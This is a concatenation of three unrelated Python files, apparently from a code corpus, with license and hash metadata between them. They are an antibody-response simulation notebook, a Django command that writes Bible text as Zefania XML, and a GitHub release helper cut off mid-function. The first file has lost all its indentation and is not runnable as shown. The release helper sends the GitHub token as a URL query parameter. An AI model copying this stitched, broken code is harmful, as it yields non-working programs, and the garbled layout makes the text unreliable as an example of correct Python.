bcell-array/code/Virus_Bcell_IgM_IgG_Infection_OAS_new.py
|
1
|
13195
|
# coding: utf-8
# # Antibody Response Pulse
# https://github.com/blab/antibody-response-pulse
#
# ### B-cells evolution --- cross-reactive antibody response after influenza virus infection or vaccination
# ### Adaptive immune response for repeated infection
# In[3]:
'''
author: Alvason Zhenhua Li
date: 04/09/2015
'''
get_ipython().magic(u'matplotlib inline')
import numpy as np
import matplotlib.pyplot as plt
import os
from matplotlib.ticker import FuncFormatter
import alva_machinery_event_OAS_new as alva
AlvaFontSize = 23
AlvaFigSize = (15, 5)
numberingFig = 0
# plotting
dir_path = '/Users/al/Desktop/GitHub/antibody-response-pulse/bcell-array/figure'
file_name = 'Virus-Bcell-IgM-IgG'
figure_name = '-equation'
file_suffix = '.png'
save_figure = os.path.join(dir_path, file_name + figure_name + file_suffix)
numberingFig = numberingFig + 1
plt.figure(numberingFig, figsize=(12, 5))
plt.axis('off')
plt.title(r'$ Virus-Bcell-IgM-IgG \ equations \ (antibody-response \ for \ repeated-infection) $'
, fontsize = AlvaFontSize)
plt.text(0, 7.0/9, r'$ \frac{\partial V_n(t)}{\partial t} = +\mu_{v}V_{n}(t)(1 - \frac{V_n(t)}{V_{max}}) - \phi_{m} M_{n}(t) V_{n}(t) - \phi_{g} G_{n}(t) V_{n}(t) $'
, fontsize = 1.2*AlvaFontSize)
plt.text(0, 5.0/9, r'$ \frac{\partial B_n(t)}{\partial t} = +\mu_{b}V_{n}(t)(1 - \frac{V_n(t)}{V_{max}}) + (\beta_{m} + \beta_{g}) V_{n}(t) B_{n}(t) - \mu_{b} B_{n}(t) + m_b V_{n}(t)\frac{B_{i-1}(t) - 2B_i(t) + B_{i+1}(t)}{(\Delta i)^2} $'
, fontsize = 1.2*AlvaFontSize)
plt.text(0, 3.0/9,r'$ \frac{\partial M_n(t)}{\partial t} = +\xi_{m} B_{n}(t) - \phi_{m} M_{n}(t) V_{n}(t) - \mu_{m} M_{n}(t) $'
, fontsize = 1.2*AlvaFontSize)
plt.text(0, 1.0/9,r'$ \frac{\partial G_n(t)}{\partial t} = +\xi_{g} B_{n}(t) - \phi_{g} G_{n}(t) V_{n}(t) - \mu_{g} G_{n}(t) + m_a V_{n}(t)\frac{G_{i-1}(t) - 2G_i(t) + G_{i+1}(t)}{(\Delta i)^2} $'
, fontsize = 1.2*AlvaFontSize)
plt.savefig(save_figure, dpi = 100)
plt.show()
# define the V-M-G partial differential equations
def dVdt_array(VBMGxt = [], *args):
# naming
V = VBMGxt[0]
B = VBMGxt[1]
M = VBMGxt[2]
G = VBMGxt[3]
x_totalPoint = VBMGxt.shape[1]
# there are n dSdt
dV_dt_array = np.zeros(x_totalPoint)
# each dSdt with the same equation form
dV_dt_array[:] = +inRateV*V[:]*(1 - V[:]/maxV) - killRateVm*M[:]*V[:] - killRateVg*G[:]*V[:]
return(dV_dt_array)
def dBdt_array(VBMGxt = [], *args):
# naming
V = VBMGxt[0]
B = VBMGxt[1]
M = VBMGxt[2]
G = VBMGxt[3]
x_totalPoint = VBMGxt.shape[1]
# there are n dSdt
dB_dt_array = np.zeros(x_totalPoint)
# each dSdt with the same equation form
Bcopy = np.copy(B)
centerX = Bcopy[:]
leftX = np.roll(Bcopy[:], 1)
rightX = np.roll(Bcopy[:], -1)
leftX[0] = centerX[0]
rightX[-1] = centerX[-1]
dB_dt_array[:] = +inRateB*V[:]*(1 - V[:]/maxV) + (actRateBm + alva.event_active + alva.event_OAS_B)*V[:]*B[:] - outRateB*B[:] + mutatRateB*V[:]*(leftX[:] - 2*centerX[:] + rightX[:])/(dx**2)
return(dB_dt_array)
def dMdt_array(VBMGxt = [], *args):
# naming
V = VBMGxt[0]
B = VBMGxt[1]
M = VBMGxt[2]
G = VBMGxt[3]
x_totalPoint = VBMGxt.shape[1]
# there are n dSdt
dM_dt_array = np.zeros(x_totalPoint)
# each dSdt with the same equation form
dM_dt_array[:] = +inRateM*B[:] - consumeRateM*M[:]*V[:] - outRateM*M[:]
return(dM_dt_array)
def dGdt_array(VBMGxt = [], *args):
# naming
V = VBMGxt[0]
B = VBMGxt[1]
M = VBMGxt[2]
G = VBMGxt[3]
x_totalPoint = VBMGxt.shape[1]
# there are n dSdt
dG_dt_array = np.zeros(x_totalPoint)
# each dSdt with the same equation form
Gcopy = np.copy(G)
centerX = Gcopy[:]
leftX = np.roll(Gcopy[:], 1)
rightX = np.roll(Gcopy[:], -1)
leftX[0] = centerX[0]
rightX[-1] = centerX[-1]
dG_dt_array[:] = +(inRateG + alva.event_OAS)*B[:] - consumeRateG*G[:]*V[:] - outRateG*G[:] + mutatRateA*(leftX[:] - 2*centerX[:] + rightX[:])/(dx**2)
return(dG_dt_array)
# In[7]:
# setting parameter
timeUnit = 'day'
if timeUnit == 'hour':
hour = float(1)
day = float(24)
elif timeUnit == 'day':
day = float(1)
hour = float(1)/24
elif timeUnit == 'year':
year = float(1)
day = float(1)/365
hour = float(1)/24/365
maxV = float(50) # max virus/micro-liter
inRateV = 0.2/hour # in-rate of virus
killRateVm = 0.0003/hour # kill-rate of virus by antibody-IgM
killRateVg = killRateVm # kill-rate of virus by antibody-IgG
inRateB = 0.06/hour # in-rate of B-cell
outRateB = inRateB/8 # out-rate of B-cell
actRateBm = killRateVm # activation rate of naive B-cell
inRateM = 0.16/hour # in-rate of antibody-IgM from naive B-cell
outRateM = inRateM/1 # out-rate of antibody-IgM from naive B-cell
consumeRateM = killRateVm # consume-rate of antibody-IgM by cleaning virus
inRateG = inRateM/10 # in-rate of antibody-IgG from memory B-cell
outRateG = outRateM/250 # out-rate of antibody-IgG from memory B-cell
consumeRateG = killRateVg # consume-rate of antibody-IgG by cleaning virus
mutatRateB = 0.00003/hour # B-cell mutation rate
mutatRateA = 0.0001/hour # antibody mutation rate
mutatRateB = 0.0000/hour # B-cell mutation rate
mutatRateA = 0.000/hour # antibody mutation rate
# time boundary and griding condition
minT = float(0)
maxT = float(6*28*day)
totalPoint_T = int(1*10**3 + 1)
gT = np.linspace(minT, maxT, totalPoint_T)
spacingT = np.linspace(minT, maxT, num = totalPoint_T, retstep = True)
gT = spacingT[0]
dt = spacingT[1]
# space boundary and griding condition
minX = float(0)
maxX = float(3)
totalPoint_X = int(maxX - minX + 1)
gX = np.linspace(minX, maxX, totalPoint_X)
gridingX = np.linspace(minX, maxX, num = totalPoint_X, retstep = True)
gX = gridingX[0]
dx = gridingX[1]
gV_array = np.zeros([totalPoint_X, totalPoint_T])
gB_array = np.zeros([totalPoint_X, totalPoint_T])
gM_array = np.zeros([totalPoint_X, totalPoint_T])
gG_array = np.zeros([totalPoint_X, totalPoint_T])
# initial output condition
#gV_array[1, 0] = float(2)
#[pre-parameter, post-parameter, recovered-day, OAS+, OSA-]
actRateBg_1st = 0.0002/hour # activation rate of memory B-cell at 1st time (pre-)
actRateBg_2nd = actRateBg_1st*10 # activation rate of memory B-cell at 2nd time (post-)
origin_virus = int(1)
current_virus = int(2)
event_parameter = np.array([[actRateBg_1st,
actRateBg_2nd,
14*day,
+5/hour,
-actRateBm - actRateBg_1st + (actRateBm + actRateBg_1st)/3,
origin_virus,
current_virus]])
# [viral population, starting time, first]
# [viral population, starting time] ---first
infection_period = 1*28*day
viral_population = np.zeros(int(maxX + 1))
viral_population[origin_virus:current_virus + 1] = 3
infection_starting_time = np.arange(int(maxX + 1))*infection_period
event_1st = np.zeros([int(maxX + 1), 2])
event_1st[:, 0] = viral_population
event_1st[:, 1] = infection_starting_time
print ('event_1st = {:}'.format(event_1st))
# [viral population, starting time] ---2nd]
viral_population = np.zeros(int(maxX + 1))
viral_population[origin_virus:current_virus + 1] = 0
infection_starting_time = np.arange(int(maxX + 1))*0
event_2nd = np.zeros([int(maxX + 1), 2])
event_2nd[:, 0] = viral_population
event_2nd[:, 1] = infection_starting_time
print ('event_2nd = {:}'.format(event_2nd))
event_table = np.array([event_parameter, event_1st, event_2nd])
# Runge Kutta numerical solution
pde_array = np.array([dVdt_array, dBdt_array, dMdt_array, dGdt_array])
initial_Out = np.array([gV_array, gB_array, gM_array, gG_array])
gOut_array = alva.AlvaRungeKutta4XT(pde_array, initial_Out, minX, maxX, totalPoint_X, minT, maxT, totalPoint_T, event_table)
# plotting
gV = gOut_array[0]
gB = gOut_array[1]
gM = gOut_array[2]
gG = gOut_array[3]
numberingFig = numberingFig + 1
for i in range(totalPoint_X):
figure_name = '-response-%i'%(i)
figure_suffix = '.png'
save_figure = os.path.join(dir_path, file_name + figure_name + file_suffix)
plt.figure(numberingFig, figsize = AlvaFigSize)
plt.plot(gT, gV[i], color = 'red', label = r'$ V_{%i}(t) $'%(i), linewidth = 3.0, alpha = 0.5)
plt.plot(gT, gM[i], color = 'blue', label = r'$ IgM_{%i}(t) $'%(i), linewidth = 3.0, alpha = 0.5)
plt.plot(gT, gG[i], color = 'green', label = r'$ IgG_{%i}(t) $'%(i), linewidth = 3.0, alpha = 0.5)
plt.plot(gT, gM[i] + gG[i], color = 'gray', linewidth = 5.0, alpha = 0.5, linestyle = 'dashed'
, label = r'$ IgM_{%i}(t) + IgG_{%i}(t) $'%(i, i))
plt.grid(True, which = 'both')
plt.title(r'$ Antibody \ from \ Virus-{%i} $'%(i), fontsize = AlvaFontSize)
plt.xlabel(r'$time \ (%s)$'%(timeUnit), fontsize = AlvaFontSize)
plt.ylabel(r'$ Neutralization \ \ titer $', fontsize = AlvaFontSize)
plt.xlim([minT, maxT])
plt.xticks(fontsize = AlvaFontSize*0.6)
plt.yticks(fontsize = AlvaFontSize*0.6)
plt.ylim([2**0, 2**14])
plt.yscale('log', basey = 2)
plt.legend(loc = (1,0), fontsize = AlvaFontSize)
plt.savefig(save_figure, dpi = 100)
plt.show()
# In[5]:
# Experimental lab data from OAS paper
gT_lab = np.array([28, 28 + 7, 28 + 14, 28 + 28]) + 28
gPR8_lab = np.array([2**(9 + 1.0/10), 2**(13 - 1.0/5), 2**(13 + 1.0/3), 2**(13 - 1.0/4)])
standard_PR8 = gPR8_lab**(3.0/4)
gFM1_lab = np.array([0, 2**(6 - 1.0/5), 2**(7 - 1.0/4), 2**(8 + 1.0/4)])
standard_FM1 = gFM1_lab**(3.0/4)
bar_width = 2.0
# Sequential immunization graph
numberingFig = numberingFig + 1
plt.figure(numberingFig, figsize = (12, 6))
plt.subplot(111)
plt.plot(gT, (gM[origin_virus] + gG[origin_virus]), linewidth = 5.0, alpha = 0.5, color = 'gray'
, label = r'$ Origin-virus $')
plt.plot(gT, (gM[origin_virus + 1] + gG[origin_virus + 1]), linewidth = 5.0, alpha = 0.5, color = 'red'
, label = r'$ Subsequence-virus $')
plt.bar(gT_lab - bar_width/2, gPR8_lab, bar_width, alpha = 0.6, color = 'gray', yerr = standard_PR8
, error_kw = dict(elinewidth = 1, ecolor = 'black'), label = r'$ PR8-virus $')
plt.bar(gT_lab + bar_width/2, gFM1_lab, bar_width, alpha = 0.6, color = 'red', yerr = standard_FM1
, error_kw = dict(elinewidth = 1, ecolor = 'black'), label = r'$ FM1-virus $')
plt.grid(True, which = 'both')
plt.title(r'$ Original \ Antigenic \ Sin \ (sequential-infection)$', fontsize = AlvaFontSize)
plt.xlabel(r'$time \ (%s)$'%(timeUnit), fontsize = AlvaFontSize)
plt.ylabel(r'$ Neutralization \ \ titer $', fontsize = AlvaFontSize)
plt.xticks(fontsize = AlvaFontSize*0.6)
plt.yticks(fontsize = AlvaFontSize*0.6)
plt.xlim([minT, 6*30*day])
plt.ylim([2**5, 2**14])
plt.yscale('log', basey = 2)
# gca()---GetCurrentAxis and Format the ticklabel to be 2**x
plt.gca().yaxis.set_major_formatter(FuncFormatter(lambda x, pos: int(2**(np.log(x)/np.log(2)))))
#plt.gca().xaxis.set_major_locator(plt.MultipleLocator(7))
plt.legend(loc = (1, 0), fontsize = AlvaFontSize)
plt.show()
# In[6]:
# Experimental lab data from OAS paper
gT_lab = np.array([28, 28 + 7, 28 + 14, 28 + 28]) + 28
gPR8_lab = np.array([2**(9 + 1.0/10), 2**(13 - 1.0/5), 2**(13 + 1.0/3), 2**(13 - 1.0/4)])
standard_PR8 = gPR8_lab**(3.0/4)
gFM1_lab = np.array([0, 2**(6 - 1.0/5), 2**(7 - 1.0/4), 2**(8 + 1.0/4)])
standard_FM1 = gFM1_lab**(3.0/4)
bar_width = 1.0
# Sequential immunization graph
figure_name = '-Original-Antigenic-Sin-infection'
figure_suffix = '.png'
save_figure = os.path.join(dir_path, file_name + figure_name + file_suffix)
numberingFig = numberingFig + 1
plt.figure(numberingFig, figsize = (12, 6))
plt.subplot(111)
plt.plot(gT, (gM[origin_virus] + gG[origin_virus]), linewidth = 5.0, alpha = 0.5, color = 'gray'
, label = r'$ Origin-virus $')
plt.plot(gT, (gM[origin_virus + 1] + gG[origin_virus + 1]), linewidth = 5.0, alpha = 0.5, color = 'red'
, label = r'$ Subsequence-virus $')
plt.bar(gT_lab - bar_width/2, gPR8_lab, bar_width, alpha = 0.6, color = 'gray', yerr = standard_PR8
, error_kw = dict(elinewidth = 1, ecolor = 'black'), label = r'$ PR8-virus $')
plt.bar(gT_lab + bar_width/2, gFM1_lab, bar_width, alpha = 0.6, color = 'red', yerr = standard_FM1
, error_kw = dict(elinewidth = 1, ecolor = 'black'), label = r'$ FM1-virus $')
plt.grid(True, which = 'both')
plt.title(r'$ Original \ Antigenic \ Sin \ (sequential-infection)$', fontsize = AlvaFontSize)
plt.xlabel(r'$time \ (%s)$'%(timeUnit), fontsize = AlvaFontSize)
plt.ylabel(r'$ Neutralization \ \ titer $', fontsize = AlvaFontSize)
plt.xticks(fontsize = AlvaFontSize*0.6)
plt.yticks(fontsize = AlvaFontSize*0.6)
plt.xlim([minT, 3*30*day])
plt.ylim([2**5, 2**14])
plt.yscale('log', basey = 2)
# gca()---GetCurrentAxis and Format the ticklabel to be 2**x
plt.gca().yaxis.set_major_formatter(FuncFormatter(lambda x, pos: int(2**(np.log(x)/np.log(2)))))
plt.gca().xaxis.set_major_locator(plt.MultipleLocator(7))
plt.legend(loc = (1, 0), fontsize = AlvaFontSize)
plt.savefig(save_figure, dpi = 100, bbox_inches='tight')
plt.show()
# In[ ]:
|
gpl-2.0
| 6,642,361,420,170,856,000
| 38.154303
| 257
| 0.619856
| false
| 2.478865
| false
| false
| false
|
lucifurtun/myquotes
|
apps/search/bible/management/commands/zefania_xml_generator.py
|
1
|
2231
|
import json
from itertools import groupby
import xmltodict
from django.core.management.base import BaseCommand
class Command(BaseCommand):
help = 'Generates zefania xml from different formats'
def handle(self, *args, **options):
with open('NTR.json') as f:
data = json.load(f)
current_b_number = 0
for item in data:
if item['chapter'] == 1 and item['verse'] == 1:
current_b_number += 1
item['b_number'] = current_b_number
grouped_books = groupby(data, lambda item: item['b_number'])
books_list = []
for book_grouper, chapters in grouped_books:
chapters_list = []
grouped_chapters = groupby(chapters, lambda item: item['chapter'])
for chapter_grouper, verses in grouped_chapters:
chapters_list.append({
'number': chapter_grouper,
'items': list(verses)
})
books_list.append({
'title': chapters_list[0]['items'][0]['long_name'],
'number': int(book_grouper),
'items': chapters_list
})
with open('NTR.xml', 'w+') as f:
d = {
'XMLBIBLE': {
'BIBLEBOOK': [
{
'@bnumber': book['number'],
'@bname': book['title'],
'CHAPTER': [
{
'@cnumber': chapter['number'],
'VERS': [
{
'@vnumber': verse['verse'],
'#text': verse['text']
} for verse in chapter['items']
]
} for chapter in book['items']
]
} for book in books_list
]
}
}
f.write(xmltodict.unparse(d, pretty=True))
self.stdout.write(self.style.SUCCESS('Imported!'))
|
bsd-3-clause
| -6,679,120,634,669,536,000
| 32.298507
| 78
| 0.404303
| false
| 5.013483
| false
| false
| false
|
vcatechnology/cmake-boilerplate
|
cmake/pygh/__init__.py
|
1
|
25114
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
import os
import sys
import json
import errno
import platform
import fileinput
import subprocess
from datetime import datetime, timezone
try:
import requests
except ImportError:
raise ImportError(
'Failed to import \'requests\', run \'pip install requests\'')
try:
import pystache
except ImportError:
raise ImportError(
'Failed to import \'pystache\', run \'pip install pystache\'')
class ReleaseError(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class ExecuteCommandError(Exception):
def __init__(self, message, cmd, code, out, err):
self.message = message
self.cmd = cmd
self.code = code
self.out = out
self.err = err
def __str__(self):
return self.message
class EmptyLogger(object):
'''Provides an implementation of an empty logging function'''
def debug(self, *k, **kw):
pass
def info(self, *k, **kw):
pass
def warn(self, *k, **kw):
pass
def error(self, *k, **kw):
pass
def critical(self, *k, **kw):
pass
def setLevel(self, *k, **kw):
pass
class Version(object):
'''Represents a version number'''
def __init__(self, *k, **kw):
'''
A version number can be instantiate with:
- a dot-separated string
- Version('1.2.3')
- an iterable
- Version([1, 2, 3])
- seperate arguments
- `Version(1, 2, 3)`
- another version class
- `Version(Version(1, 2, 3))`
- a dictionary
- `Version({'minor':2,'major':1,'patch':3})`
- keywords
- `Version(minor = 2,major = 1, patch = 3)`
'''
try:
version = (k[0].major, k[0].minor, k[0].patch)
except (AttributeError, TypeError):
try:
version = (kw['major'], kw['minor'], kw['patch'])
except (KeyError, TypeError):
try:
version = (k[0]['major'], k[0]['minor'], k[0]['patch'])
except (KeyError, TypeError):
if isinstance(k[0], str):
version = k[0].split('.')
else:
try:
version = (k[0][0], k[0][1], k[0][2])
except (IndexError, TypeError):
version = k
self.major = int(version[0])
self.minor = int(version[1])
self.patch = int(version[2])
def bump(self, category):
'''
Bumps the version number depending on the category
'''
setattr(self, category, getattr(self, category) + 1)
if category == 'major':
self.minor = 0
self.patch = 0
elif category == 'minor':
self.patch = 0
def __gt__(self, other):
return tuple(self) > tuple(other)
def __ge__(self, other):
return tuple(self) >= tuple(other)
def __lt__(self, other):
return tuple(self) < tuple(other)
def __le__(self, other):
return tuple(self) <= tuple(other)
def __eq__(self, other):
return tuple(self) == tuple(other)
def __ne__(self, other):
return tuple(self) != tuple(other)
def __getitem__(self, index):
'''
Allows iteration of the version number
'''
if index == 0:
return self.major
elif index == 1:
return self.minor
elif index == 2:
return self.patch
else:
raise IndexError('version index out of range')
def __repr__(self):
'''
Provides a dot-separated string representation of the version number
'''
return '%i.%i.%i' % (self.major, self.minor, self.patch)
class GitVersion(Version):
'''A git repository version number'''
def __init__(self, *k, **kw):
'''
A git version number can be instantiate with:
- a dot-separated string
- Version('1.2.3.ef3aa43d-dirty')
- an iterable
- Version([1, 2, 3, 'ef3aa43d', True])
- seperate arguments
- `Version(1, 2, 3, 'ef3aa43d', True)`
- another version class
- `Version(Version(1, 2, 3, 'ef3aa43d', True))`
- a dictionary
- `Version({'minor':2,'major':1,'patch':3, 'commit': 'ef3aa43d', 'dirty', True})`
- keywords
- `Version(minor = 2,major = 1, patch = 3, commit ='ef3aa43d', dirty =True)`
'''
super(GitVersion, self).__init__(*k, **kw)
try:
version = (k[0].commit, k[0].dirty)
except (AttributeError, TypeError):
try:
version = (kw['commit'], kw['dirty'])
except (KeyError, TypeError):
try:
version = (k[0]['commit'], k[0]['dirty'])
except (KeyError, TypeError):
if isinstance(k[0], str):
version = k[0].split('.')[3]
else:
try:
version = (k[0][3], k[0][4])
except (IndexError, TypeError):
version = k[3:]
self.commit = str(version[0])
try:
self.dirty = bool(version[1])
except:
try:
split = self.commit.split('-')
self.dirty = (split[1] == 'dirty')
self.commit = split[0]
except:
self.dirty = False
try:
int(self.commit, 16)
except ValueError:
raise ValueError('The git commit string is not hexidecimal: %s'
% self.commit)
def __repr__(self):
'''
Provides a dot-separated string representation of the version number
'''
string = '%s.%s' % (super(GitVersion, self).__repr__(),
self.commit[:8])
if self.dirty:
string += '-dirty'
return string
def find_exe_in_path(filename, path=None):
'''
Finds an executable in the PATH environment variable
'''
if platform.system() == 'Windows':
filename += '.exe'
if path is None:
path = os.environ.get('PATH', '')
if type(path) is type(''):
pathlist = path.split(os.pathsep)
return list(filter(os.path.exists, map(lambda dir, filename=filename: os.path.join(dir, filename), pathlist)))
def execute_command(cmd,
error_message='Failed to run external program',
expected=0,
cwd=os.getcwd()):
p = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
cwd=cwd)
(out, err) = p.communicate()
if expected != None and p.returncode != expected:
raise ExecuteCommandError(error_message, cmd, p.returncode, out, err)
return (p.returncode, out, err)
def close_milestone(number, repo, token, logger=EmptyLogger()):
logger.debug('Closing milestone #%d for %s' % (number, repo))
number = int(number)
r = requests.patch('https://api.github.com/repos/%s/milestones/%d' %
(repo, number),
params={
'access_token': token,
},
json={
'state': 'closed',
})
if r.status_code != 200:
json = r.json()
message = json['message']
errors = json.get('errors', [])
for e in errors:
message += '\n - %s: %s: %s' % (e.get('resource', 'unknown'),
e.get('field', 'unknown'),
e.get('code', 'unknown'))
raise ReleaseError('Failed to close github milestone #%d: %s' %
(number, message))
logger.info('Closed milestone #%d' % number)
return r.json()
def get_milestones(repo, token, logger=EmptyLogger()):
logger.debug('Retrieving milestones for %s' % repo)
r = requests.get('https://api.github.com/repos/%s/milestones' % repo,
params={
'access_token': token,
})
if r.status_code != 200:
raise ReleaseError('Failed to retrieve github milestones from %s: %s' %
(repo, r.json()['message']))
return r.json()
def get_git_tag_version(path,
git_executable=find_exe_in_path('git'),
logger=EmptyLogger()):
if isinstance(git_executable, list):
git_executable = git_executable[0]
logger.debug('Getting latest git tag version')
# Get the head commit
cmd = [git_executable, 'rev-parse', 'HEAD']
_, out, _ = execute_command(cmd,
'Failed to get HEAD revision of repository',
cwd=path)
commit = out.split('\n')[0].strip()
if commit == 'HEAD' or not commit:
commit = '0000000000000000000000000000000000000000'
# Check if dirty
dirty = False
cmd = [git_executable, 'diff-index', '--name-only', 'HEAD']
if execute_command(
cmd,
'Failed to check if the project had local modifications',
cwd=path)[1]:
dirty = True
cmd = [git_executable, 'status', '--porcelain']
if '?? ' in execute_command(
cmd,
'Failed to check if the project had local modifications',
cwd=path)[1]:
dirty = True
# Find the latest tag
cmd = [git_executable, 'describe', '--match=v[0-9]*', 'HEAD']
code, out, _ = execute_command(cmd, expected=None, cwd=path)
if code:
return GitVersion(0, 0, 0, commit, dirty)
# Parse the tag
re_tag = re.compile('^v([0-9]+)\.([0-9]+)\.([0-9]+)(-[0-9]+-g[a-f0-9]+)?')
matches = re_tag.match(out)
major = int(matches.group(1))
minor = int(matches.group(2))
revision = int(matches.group(3))
version = GitVersion(major, minor, revision, commit, dirty)
logger.info('Latest git tag version %s' % version)
return version
re_remote_fetch_url = re.compile(
r'Fetch URL: (?:(?:(git)(?:@))|(?:(https)(?:://)))([^:/]+)[:/]([^/]+/[^.]+)(?:\.git)?')
def get_repo(path=os.getcwd(), git_executable=find_exe_in_path('git')):
if isinstance(git_executable, list):
git_executable = git_executable[0]
cmd = [git_executable, 'remote', 'show', '-n', 'origin']
code, out, err = execute_command(
cmd,
'Failed to get repository remote information',
cwd=path)
match = re_remote_fetch_url.search(out)
if not match:
raise ExecuteCommandError('Failed to match fetch url', cmd, code, out,
err)
protocol = match.group(1) or match.group(2)
server = match.group(3)
if server != 'github.com':
raise ExecuteCommandError('Repository is not from github', cmd, code,
out, err)
repo = match.group(4)
return repo
def get_git_version(git_executable=find_exe_in_path('git'),
logger=EmptyLogger()):
if isinstance(git_executable, list):
git_executable = git_executable[0]
logger.debug('Getting git version')
_, out, _ = execute_command([git_executable, '--version'])
git_version = Version(out.replace('git version ', ''))
logger.debug('Using git %s' % git_version)
return git_version
changelog_template = \
'## [v{{version.to}}](https://github.com/{{repo}}/tree/v{{version.to}}) ({{date}})\n' \
'{{#version.from}}' \
'[Full Changelog](https://github.com/{{repo}}/compare/v{{version.from}}...v{{version.to}})' \
'{{/version.from}}' \
'{{#milestone}}' \
'{{#version.from}} {{/version.from}}' \
'[Milestone]({{html_url}})' \
'{{/milestone}}\n' \
'\n' \
'{{description}}\n' \
'\n' \
'**Closed issues:**\n' \
'{{#issues}}\n' \
'\n' \
' - {{title}} [\#{{number}}]({{html_url}})\n' \
'{{/issues}}\n' \
'{{^issues}}\n' \
'\n' \
'_None_\n' \
'{{/issues}}\n' \
'\n' \
'**Merged pull requests:**\n' \
'{{#pullrequests}}\n' \
'\n' \
' - {{title}} [\#{{number}}]({{pull_request.html_url}})\n' \
'{{/pullrequests}}\n' \
'{{^pullrequests}}\n' \
'\n' \
'_None_\n' \
'{{/pullrequests}}\n'
def get_closed_issues(repo,
token=os.environ.get('GITHUB_TOKEN', None),
since=None,
logger=EmptyLogger()):
logger.debug('Getting issues for %s' % (repo))
if not token:
raise ReleaseError('Must provide a valid GitHub API token')
issues = []
params = {'state': 'closed', 'sort': 'asc', 'access_token': token, }
if since:
since = since.astimezone(timezone.utc)
params['since'] = since.isoformat()[:19] + 'Z'
r = requests.get('https://api.github.com/repos/%s/issues' % repo,
params=params)
if r.status_code != 200:
raise ReleaseError('Failed to retrieve github issues from %s: %s' %
(repo, r.json()['message']))
issues = r.json()
logger.debug('Retrieved %i closed issues for %s' % (len(issues), repo))
return issues
def create_changelog(current_version,
previous_version,
repo,
milestone=None,
token=os.environ.get('GITHUB_TOKEN', None),
description=None,
since=None,
date=datetime.utcnow(),
template=changelog_template,
logger=EmptyLogger()):
logger.debug('Creating changelog for %s from %s' % (current_version, repo))
description = description or 'The v%s release of %s' % (current_version,
repo.split('/')[1])
issues = get_closed_issues(repo=repo,
token=token,
since=since,
logger=logger)
if milestone:
milestone[
'html_url'] = 'https://github.com/%s/issues?q=milestone%%3Av%s+is%%3Aall' % (
repo, current_version)
data = {
'version': {
'from': str(previous_version)
if previous_version > (0, 0, 0) else None,
'to': str(current_version),
},
'milestone': milestone,
'date': date.isoformat()[:10],
'repo': repo,
'description': description,
'issues': [i for i in issues if not i.get('pull_request', None)],
'pullrequests': [i for i in issues if i.get('pull_request', None)],
}
renderer = pystache.Renderer()
parsed = pystache.parse(template)
changelog = renderer.render(parsed, data)
logger.info('Rendered changelog')
return changelog
def write_version(path, version, logger=EmptyLogger()):
if not isinstance(version, Version):
raise ValueError('must provide a version class')
version = Version(version)
with open(path, 'w') as f:
f.write('%s' % version)
logger.info('Wrote %s' % os.path.basename(path))
def write_changelog(path, changelog, logger=EmptyLogger()):
try:
for line in fileinput.input(path, inplace=True):
sys.stdout.write(line)
if line.startswith('# Changelog'):
print()
sys.stdout.write(changelog)
logger.info('Updated %s' % os.path.basename(path))
except EnvironmentError as e:
if e.errno == errno.ENOENT:
with open(path, 'w') as f:
f.write('# Changelog\n\n')
f.write(changelog)
logger.info('Created %s' % os.path.basename(path))
else:
raise
def get_git_root(path, git_executable=find_exe_in_path('git')):
abspath = os.path.abspath(path)
if os.path.isfile(abspath):
abspath = os.path.dirname(abspath)
cmd = [git_executable, 'rev-parse', '--show-toplevel']
_, out, _ = execute_command(cmd,
'Failed to find root of repository',
cwd=abspath)
return out.strip()
def commit_file(path,
message,
git_executable=find_exe_in_path('git'),
logger=EmptyLogger()):
if isinstance(git_executable, list):
git_executable = git_executable[0]
logger.debug('Commiting %s' % path)
cwd = get_git_root(path, git_executable=git_executable)
path = os.path.relpath(path, cwd)
cmd = [git_executable, 'add', path]
execute_command(cmd, 'Failed to add file %s' % path, cwd=cwd)
cmd = [git_executable, 'commit', '-m', message]
execute_command(cmd, 'Failed to commit file %s' % path, cwd=cwd)
logger.info('Committed %s' % path)
def get_tag_date(tag,
path=os.getcwd(),
git_executable=find_exe_in_path('git')):
if isinstance(git_executable, list):
git_executable = git_executable[0]
cwd = get_git_root(path, git_executable=git_executable)
cmd = [git_executable, 'log', '-1', '--format=%ai', tag]
_, out, _ = execute_command(cmd,
'Failed to get tag date: %s' % tag,
cwd=cwd)
out = out.strip()
return datetime.strptime(out, '%Y-%m-%d %H:%M:%S %z')
def create_git_version_tag(version,
message=None,
path=os.getcwd(),
git_executable=find_exe_in_path('git'),
logger=EmptyLogger()):
if isinstance(git_executable, list):
git_executable = git_executable[0]
if not isinstance(version, Version):
raise ValueError('must provide a version class')
version = Version(version)
logger.debug('Tagging %s' % version)
message = message or 'The v%s release of the project' % version
cwd = get_git_root(path, git_executable=git_executable)
cmd = [git_executable, 'tag', '-a', 'v%s' % version, '-m', message]
execute_command(cmd, 'Failed to create version tag %s' % version, cwd=cwd)
logger.info('Tagged %s' % version)
def create_release(repo,
version,
description,
token=os.environ.get('GITHUB_TOKEN', None),
files=[],
path=os.getcwd(),
git_executable=find_exe_in_path('git'),
logger=EmptyLogger()):
if isinstance(git_executable, list):
git_executable = git_executable[0]
if not isinstance(version, Version):
raise ValueError('must provide a version class')
logger.debug('Creating github release %s' % version)
r = requests.post('https://api.github.com/repos/%s/releases' % repo,
params={
'access_token': token,
},
json={
'tag_name': 'v%s' % version,
'name': str(version),
'body': description,
})
if r.status_code != 201:
json = r.json()
message = json['message']
errors = json.get('errors', [])
for e in errors:
message += '\n - %s: %s: %s' % (e.get('resource', 'unknown'),
e.get('field', 'unknown'),
e.get('code', 'unknown'))
raise ReleaseError('Failed to create github release %s: %s' %
(repo, message))
logger.info('Created GitHub release')
def release(category='patch',
path=os.getcwd(),
git_executable=find_exe_in_path('git'),
token=os.environ.get('GITHUB_TOKEN', None),
repo=None,
date=datetime.utcnow(),
description=None,
changelog='CHANGELOG.md',
version='VERSION',
template=changelog_template,
logger=EmptyLogger(),
hooks={}):
'''
Performs the release of a repository on GitHub.
'''
if isinstance(git_executable, list):
git_executable = git_executable[0]
logger.debug('Starting %r release' % category)
git_version = get_git_version(git_executable=git_executable, logger=logger)
if git_version < (1, 0, 0):
raise ReleaseError('The version of git is too old %s' % git_version)
previous_version = get_git_tag_version(path=path,
git_executable=git_executable,
logger=logger)
if previous_version.dirty:
raise ReleaseError(
